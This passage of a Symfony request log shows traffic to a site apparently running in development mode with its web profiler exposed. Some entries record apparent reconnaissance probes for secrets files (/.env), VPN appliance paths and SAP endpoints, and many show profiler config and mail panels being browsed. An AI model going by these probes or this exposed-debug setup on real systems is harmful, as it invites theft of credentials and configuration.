  3165. [2025-12-18 03:30:43] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3166. [2025-12-18 03:31:06] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
  3167. [2025-12-18 03:31:08] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
  3168. [2025-12-18 03:31:15] request.INFO: Matched route "_wdt". {"route":"_wdt","route_parameters":{"_controller":"web_profiler.controller.profiler:toolbarAction","token":"8d2d6c","_route":"_wdt"},"request_uri":"https://unda.co/_wdt/8d2d6c","method":"GET"} []
  3169. [2025-12-18 03:31:21] request.INFO: Matched route "_wdt". {"route":"_wdt","route_parameters":{"_controller":"web_profiler.controller.profiler:toolbarAction","token":"e94f9e","_route":"_wdt"},"request_uri":"https://unda.co/_wdt/e94f9e","method":"GET"} []
  3170. [2025-12-18 03:31:26] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3171. [2025-12-18 03:31:28] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"POST"} []
  3172. [2025-12-18 03:32:56] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  3173. [2025-12-18 03:32:57] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
  3174. [2025-12-18 03:34:04] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/latest?ip=104.234.115.18&limit=10&method=GET","method":"GET"} []
  3175. [2025-12-18 03:34:04] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=104.234.115.18&limit=10&method=GET","method":"GET"} []
  3176. [2025-12-18 03:36:04] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"6310fa","_route":"_profiler_search_results"},"request_uri":"https://www.unda.co/_profiler/6310fa/search/results?limit=10","method":"GET"} []
  3177. [2025-12-18 03:36:04] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?limit=10","method":"GET"} []
  3178. [2025-12-18 03:36:41] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml.gz"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml.gz\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3179. [2025-12-18 03:38:22] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://www.unda.co/","method":"GET"} []
  3180. [2025-12-18 03:48:05] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"f4dabc","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/f4dabc?panel=config","method":"GET"} []
  3181. [2025-12-18 03:48:05] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=config","method":"GET"} []
  3182. [2025-12-18 03:54:11] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"0397c8","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/0397c8?panel=logger","method":"GET"} []
  3183. [2025-12-18 03:54:11] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=logger","method":"GET"} []
  3184. [2025-12-18 03:56:16] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"e71d17","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/e71d17?panel=request","method":"GET"} []
  3185. [2025-12-18 03:56:16] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=request","method":"GET"} []
  3186. [2025-12-18 03:57:56] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3187. [2025-12-18 04:02:38] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"822e44","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/822e44?panel=events","method":"GET"} []
  3188. [2025-12-18 04:02:38] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=events","method":"GET"} []
  3189. [2025-12-18 04:08:31] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"0409e5","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/0409e5?panel=swiftmailer","method":"GET"} []
  3190. [2025-12-18 04:08:31] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=swiftmailer","method":"GET"} []
  3191. [2025-12-18 04:09:06] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /+CSCOL+/Java.jar"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /+CSCOL+/Java.jar\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3192. [2025-12-18 04:09:08] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /+CSCOL+/a1.jar"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /+CSCOL+/a1.jar\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3193. [2025-12-18 04:10:12] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"0c03d3","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/0c03d3?panel=config","method":"GET"} []
  3194. [2025-12-18 04:10:12] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=config","method":"GET"} []
  3195. [2025-12-18 04:14:34] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"1812fa","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/1812fa?panel=swiftmailer","method":"GET"} []
  3196. [2025-12-18 04:14:34] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=swiftmailer","method":"GET"} []
  3197. [2025-12-18 04:17:09] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3198. [2025-12-18 04:27:49] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /service/api-docs/"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /service/api-docs/\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3199. [2025-12-18 04:32:50] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
  3200. [2025-12-18 04:33:19] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  3201. [2025-12-18 04:36:40] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"8ae359","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/8ae359?panel=cache","method":"GET"} []
  3202. [2025-12-18 04:36:40] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
  3203. [2025-12-18 04:41:26] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3204. [2025-12-18 04:46:50] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
  3205. [2025-12-18 04:54:51] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"ee0387","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/ee0387?panel=dump","method":"GET"} []
  3206. [2025-12-18 04:54:51] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=dump","method":"GET"} []
  3207. [2025-12-18 04:56:03] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3208. [2025-12-18 04:56:59] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  3209. [2025-12-18 05:01:46] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"12dd43","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/12dd43?panel=swiftmailer","method":"GET"} []
  3210. [2025-12-18 05:01:46] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=swiftmailer","method":"GET"} []
  3211. [2025-12-18 05:12:39] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap_index.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap_index.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3212. [2025-12-18 05:15:53] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"0409e5","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/0409e5?panel=validator","method":"GET"} []
  3213. [2025-12-18 05:15:53] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=validator","method":"GET"} []
  3214. [2025-12-18 05:18:24] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"0409e5","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/0409e5?panel=twig","method":"GET"} []
  3215. [2025-12-18 05:18:24] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
  3216. [2025-12-18 05:26:05] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"aa0429","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/aa0429?panel=form","method":"GET"} []
  3217. [2025-12-18 05:26:05] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=form","method":"GET"} []
  3218. [2025-12-18 05:29:04] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3219. [2025-12-18 05:31:10] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"e0b8ae","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/e0b8ae?panel=events","method":"GET"} []
  3220. [2025-12-18 05:31:10] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=events","method":"GET"} []
  3221. [2025-12-18 05:32:56] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"b144c2","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/b144c2?panel=validator","method":"GET"} []
  3222. [2025-12-18 05:32:56] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=validator","method":"GET"} []
  3223. [2025-12-18 05:38:49] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"45c799","_route":"_profiler_search_results"},"request_uri":"https://www.unda.co/_profiler/45c799/search/results?limit=10&method=GET","method":"GET"} []
  3224. [2025-12-18 05:38:49] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?limit=10&method=GET","method":"GET"} []
  3225. [2025-12-18 05:42:13] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"0409e5","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/0409e5?panel=router","method":"GET"} []
  3226. [2025-12-18 05:42:13] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=router","method":"GET"} []
  3227. [2025-12-18 05:42:13] request.INFO: Matched route "_profiler_router". {"route":"_profiler_router","route_parameters":{"_controller":"web_profiler.controller.router:panelAction","token":"0409e5","_route":"_profiler_router"},"request_uri":"https://www.unda.co/_profiler/0409e5/router","method":"GET"} []
  3228. [2025-12-18 05:42:54] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3229. [2025-12-18 05:43:08] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"d7d5e3","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/d7d5e3?panel=cache","method":"GET"} []
  3230. [2025-12-18 05:43:08] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
  3231. [2025-12-18 05:43:10] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"d7d5e3","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/d7d5e3?panel=time","method":"GET"} []
  3232. [2025-12-18 05:43:10] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=time","method":"GET"} []
  3233. [2025-12-18 05:51:41] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"0397c8","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/0397c8?panel=time","method":"GET"} []
  3234. [2025-12-18 05:51:41] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=time","method":"GET"} []
  3235. [2025-12-18 05:54:09] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"f8e8c5","_route":"_profiler"},"request_uri":"https://auth.unda.co/_profiler/f8e8c5?panel=validator","method":"GET"} []
  3236. [2025-12-18 05:54:09] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://auth.unda.co/_profiler/search_bar?panel=validator","method":"GET"} []
  3237. [2025-12-18 05:58:08] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"d7d5e3","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/d7d5e3?panel=config","method":"GET"} []
  3238. [2025-12-18 05:58:08] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=config","method":"GET"} []
  3239. [2025-12-18 05:59:40] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"0397c8","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/0397c8?panel=swiftmailer","method":"GET"} []
  3240. [2025-12-18 05:59:40] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=swiftmailer","method":"GET"} []
  3241. [2025-12-18 06:01:53] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"d7d5e3","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/d7d5e3","method":"GET"} []
  3242. [2025-12-18 06:01:53] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
  3243. [2025-12-18 06:01:59] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"40ceeb","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/40ceeb?panel=twig","method":"GET"} []
  3244. [2025-12-18 06:01:59] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
  3245. [2025-12-18 06:02:26] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3246. [2025-12-18 06:08:46] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"45c799","_route":"_profiler_search_results"},"request_uri":"https://www.unda.co/_profiler/45c799/search/results?limit=10&method=GET","method":"GET"} []
  3247. [2025-12-18 06:08:46] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?limit=10&method=GET","method":"GET"} []
  3248. [2025-12-18 06:09:30] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /developmentserver/metadatauploader"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /developmentserver/metadatauploader\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3249. [2025-12-18 06:17:24] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
